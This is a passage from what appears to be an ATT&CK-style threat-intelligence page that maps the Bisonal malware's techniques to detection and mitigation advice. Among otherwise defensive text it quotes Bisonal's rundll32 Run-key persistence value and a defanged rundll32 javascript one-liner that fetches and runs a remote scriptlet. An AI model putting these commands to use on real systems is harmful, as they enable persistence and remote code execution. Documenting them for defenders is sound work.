Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2)

Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including the startup folders.

Windows Registry: Windows Registry Key Creation

Initial construction of a new Registry Key (ex: Windows EID 4656 or Sysmon EID 12)

Monitor for newly created windows registry keys that may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.

Windows Registry: Windows Registry Key Modification

Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14)

Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations.

Obfuscated Files or Information

Defense Evasion

Bisonal's DLL file and non-malicious decoy file are encrypted with RC4 and some function name strings are obfuscated.

Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.

Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.  Adversaries may also used compressed or archived scripts, such as JavaScript.

Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery.  Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. 

Adversaries may also obfuscate commands executed from payloads or directly via a Command and Scripting Interpreter. Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms.


Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted. 

Behavior Prevention on Endpoint

On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent execution of potentially obfuscated scripts.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor executed commands and arguments containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''"'''. Deobfuscation tools can be used to detect these indicators in files/payloads.

File: File Creation

Initial construction of a new file (ex: Sysmon EID 11)

Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).

File: File Metadata

Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.

Process: Process Creation

Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)

Monitor for newly executed processes that may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.

Obfuscated Files or Information

Defense Evasion

Binary Padding

Bisonal has appended random binary data to the end of itself to generate a large binary.

Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.

Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures. The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware. Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.

Monitoring the following activities in your Organization can help you detect this technique.

File: File Metadata

Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.

Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool. When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file.

Obfuscated Files or Information

Defense Evasion

Software Packing

Bisonal has used the MPRESS packer and similar tools for obfuscation.

Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.

Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.


Employ heuristic-based malware detection. Ensure updated virus definitions and create custom signatures for observed malware.

Monitoring the following activities in your Organization can help you detect this technique.

File: File Metadata

Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.

Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.


Defense Evasion

Bisonal dropped a decoy payload with a .jpg extension that contained a malicious Visual Basic script.

Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.

Renaming abusable system utilities to evade security monitoring is also a form of Masquerading.

Code Signing

Require signed binaries.

Execution Prevention

Use tools that restrict program execution via application control by attributes other than file name for common operating system utilities that are needed.

Restrict File and Directory Permissions

Use file system access controls to protect folders such as C:\Windows\System32.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor executed commands and arguments that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.

File: File Metadata

Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.

Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters"\u202E", "[U+202E]", and "%E2%80%AE".

File: File Modification

Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2)

Monitor for changes made to files outside of an update or patch that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.

Image: Image Metadata

Contextual data about a virtual machine image such as name, resource group, state, or type

Collecting disk and resource filenames for binaries, comparing that the InternalName, OriginalFilename, and/or ProductName match what is expected, could provide useful leads but may not always be indicative of malicious activity.

Process: Process Metadata

Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.

Monitor for file names that are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled.

Scheduled Job: Scheduled Job Metadata

Contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.

Monitor for contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.

Scheduled Job: Scheduled Job Modification

Changes made to a scheduled job, such as modifications to the execution launch (ex: Windows EID 4702 or /var/log cron logs)

Monitor for changes made to scheduled jobs that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.

Service: Service Creation

Initial construction of a new service/daemon (ex: Windows EID 4697 or /var/log daemon logs)

Monitor for newly constructed services/daemons that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.

Service: Service Metadata

Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.

Monitor for contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.


Defense Evasion

Match Legitimate Name or Location

Bisonal has renamed malicious code to msacm32.dll to hide within a legitimate library; earlier versions were disguised as winhelp.

Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.

Adversaries may also use the same icon of the file they are trying to mimic.

Code Signing

Require signed binaries and images.

Execution Prevention

Use tools that restrict program execution via application control by attributes other than file name for common operating system utilities that are needed.

Restrict File and Directory Permissions

Use file system access controls to protect folders such as C:\Windows\System32.

Monitoring the following activities in your Organization can help you detect this technique.

File: File Metadata

Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.

Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.

Image: Image Metadata

Contextual data about a virtual machine image such as name, resource group, state, or type

In containerized environments, use image IDs and layer hashes to compare images instead of relying only on their names. Monitor for the unexpected creation of new resources within your cluster in Kubernetes, especially those created by atypical users.

Process: Process Metadata

Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.

Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity.

Indicator Removal on Host

Defense Evasion

File Deletion

Bisonal will delete its dropper and VBS scripts from the victim’s machine.

Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.

There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples of built-in Command and Scripting Interpreter functions include del on Windows and rm or unlink on Linux and macOS.

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor executed commands and arguments for actions that could be utilized to unlink, rename, or delete files.

File: File Deletion

Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules)

Monitor for unexpected deletion of files from the system

Modify Registry

Defense Evasion

Bisonal has deleted Registry keys to clean up its prior activity.

Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.

Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification.  Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.

Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via Reg or other utilities using the Win32 API.  Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.

The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system.  Often Valid Accounts are required, along with access to the remote system's SMB/Windows Admin Shares for RPC communication.

Restrict Registry Permissions

Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor executed commands and arguments for actions that could be taken to change, conceal, and/or delete information in the Registry. The Registry may also be modified through Windows system management tools such as Windows Management Instrumentation and PowerShell, which may require additional logging features to be configured in the operating system to collect necessary information for analysis.

Process: OS API Execution

Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

Monitor for API calls associated with concealing Registry keys, such as Reghide.  Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns and RegDelNull.

Process: Process Creation

Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)

Monitor processes and command-line arguments for actions that could be taken to change, conceal, and/or delete information in the Registry. (i.e. reg.exe, regedit.exe)

Windows Registry: Windows Registry Key Creation

Initial construction of a new Registry Key (ex: Windows EID 4656 or Sysmon EID 12)

Monitor for newly constructed registry keys or values to aid in persistence and execution.

Windows Registry: Windows Registry Key Deletion

Removal of a Registry Key (ex: Windows EID 4658 or Sysmon EID 12)

Monitor for unexpected deletion of windows registry keys to hide configuration information, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.

Windows Registry: Windows Registry Key Modification

Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14)

Monitor for changes made to windows registry keys or values. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods).  Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.

Deobfuscate/Decode Files or Information

Defense Evasion

Bisonal has decoded strings in the malware using XOR and RC4.

Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.

One such example is use of certutil to decode a remote access tool portable executable file that has been hidden inside a certificate file.  Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload.

Sometimes a user's action may be required to open it for deobfuscation or decryption as part of User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.

Monitoring the following activities in your Organization can help you detect this technique.

File: File Modification

Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2)

Monitor for changes made to files for unexpected modifications that attempt to hide artifacts.

Process: Process Creation

Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)

Monitor for newly executed processes that attempt to hide artifacts of an intrusion, such as common archive file applications and extensions (ex: Zip and RAR archive tools), and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.

Script: Script Execution

Launching a list of commands through a script file (ex: Windows EID 4104)

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

System Binary Proxy Execution

Defense Evasion


Bisonal has used rundll32.exe to execute as part of the Registry Run key it adds: HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Run\"vert" = "rundll32.exe c:\windows\temp\pvcu.dll , Qszdez".

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).

Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. 

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. 

Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones. DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).

Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.

Exploit Protection

Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass application control.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.

File: File Metadata

Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.

Analyze contextual data about executed DLL files, which may include information such as name, the content (ex: signature, headers, or data/media), age, user/ower, permissions, etc.

Module: Module Load

Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7)

Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.

Process: Process Creation

Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)

Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.

Virtualization/Sandbox Evasion

Defense Evasion

Bisonal can check to determine if the compromised system is running on VMware.

Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.

Adversaries may use several methods to accomplish Virtualization/Sandbox Evasion such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor executed commands and arguments that may employ various means to detect and avoid virtualization and analysis environments. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required.

Process: OS API Execution

Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

Monitor for API calls that may employ various means to detect and avoid virtualization and analysis environments. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required.

Process: Process Creation

Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)

Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.

Virtualization/Sandbox Evasion

Defense Evasion

Time Based Evasion

Bisonal has checked if the malware is running in a virtual environment with the anti-debug function GetTickCount() to compare the timing.

Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.

Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: Scheduled Task/Job). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled Multi-Stage Channels to avoid analysis and scrutiny.

Benign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as Pings, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments. Another variation, commonly referred to as API hammering, involves making various calls to Native API functions in order to delay execution (while also potentially overloading analysis environments with junk data).

Adversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor executed commands and arguments that may employ various time-based methods to detect and avoid virtualization and analysis environments. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required.

Process: OS API Execution

Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

Monitor for API calls that may employ various time-based methods to detect and avoid virtualization and analysis environments. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required.

Process: Process Creation

Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)

Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.

Query Registry


Bisonal has used the RegQueryValueExA function to retrieve proxy information in the Registry.

Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.

The Registry contains a significant amount of information about the operating system, configuration, software, and security. Information can easily be queried using the Reg utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from Query Registry during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor executed commands and arguments for actions that may interact with the Windows Registry to gather information about the system, configuration, and installed software.

Process: OS API Execution

Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

Monitor for API calls (such as RegOpenKeyExA) that may interact with the Windows Registry to gather information about the system, configuration, and installed software.

Process: Process Creation

Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)

Monitor for newly executed processes that may interact with the Windows Registry to gather information about the system, configuration, and installed software.

Windows Registry: Windows Registry Key Access

Opening a Registry Key, typically to read the associated value (ex: Windows EID 4656)

Monitor for unexpected process interactions with the Windows Registry (i.e. reads) that may be related to gathering information.

System Network Configuration Discovery


Bisonal can execute ipconfig on the victim’s machine.

Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp, ipconfig/ifconfig, nbtstat, and route.

Adversaries may also leverage a Network Device CLI on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes.

Adversaries may use the information from System Network Configuration Discovery during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor executed commands and arguments that may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems.

Process: OS API Execution

Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

Monitor for API calls (such as GetAdaptersInfo() and GetIpNetTable()) that may gather details about the network configuration and settings, such as IP and/or MAC addresses.

Process: Process Creation

Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)

Monitor for executed processes (such as ipconfig/ifconfig and arp) with arguments that may look for details about the network configuration and settings, such as IP and/or MAC addresses.

Script: Script Execution

Launching a list of commands through a script file (ex: Windows EID 4104)

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Process Discovery


Bisonal can obtain a list of running processes on the victim’s machine.

Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

In Windows environments, adversaries could obtain details on running processes using the Tasklist utility via cmd or Get-Process via PowerShell. Information about processes can also be extracted from the output of Native API calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor executed commands and arguments for actions that may attempt to get information about running processes on a system.

Process: OS API Execution

Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

Monitor for API calls may attempt to get information about running processes on a system.

Process: Process Creation

Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)

Monitor for newly executed processes that may attempt to get information about running processes on a system.

System Information Discovery


Bisonal has used commands and API calls to gather system information.

An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Tools such as Systeminfo can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a Network Device CLI on network devices to gather detailed system information. System Information Discovery combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.

Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor executed commands and arguments that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.

Process: OS API Execution

Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

Monitor for API calls that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.

Process: Process Creation

Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)

Monitor newly executed processes that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.

File and Directory Discovery


Bisonal can retrieve a file listing from the system.

Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. Custom tools may also be used to gather file and directory information and interact with the Native API. Adversaries may also leverage a Network Device CLI on network devices to gather file and directory information.

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor executed commands and arguments that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.

Process: OS API Execution

Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

Monitor for API calls that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.

Process: Process Creation

Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)

Monitor newly executed processes that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.

System Time Discovery


Bisonal can check the system time set on the infected host.

An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. 

System time information may be gathered in a number of ways, such as with Net on Windows by performing net time \hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. 

This information could be useful for performing other techniques, such as executing a file with a Scheduled Task/Job, or to discover locality information based on time zone to assist in victim targeting (i.e. System Location Discovery). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor executed commands and arguments for actions that may gather the system time and/or time zone from a local or remote system.

Process: OS API Execution

Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

Monitor for API calls that may gather the system time and/or time zone from a local or remote system. Remote access tools with built-in features may interact directly with the Windows API to gather information.

Process: Process Creation

Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)

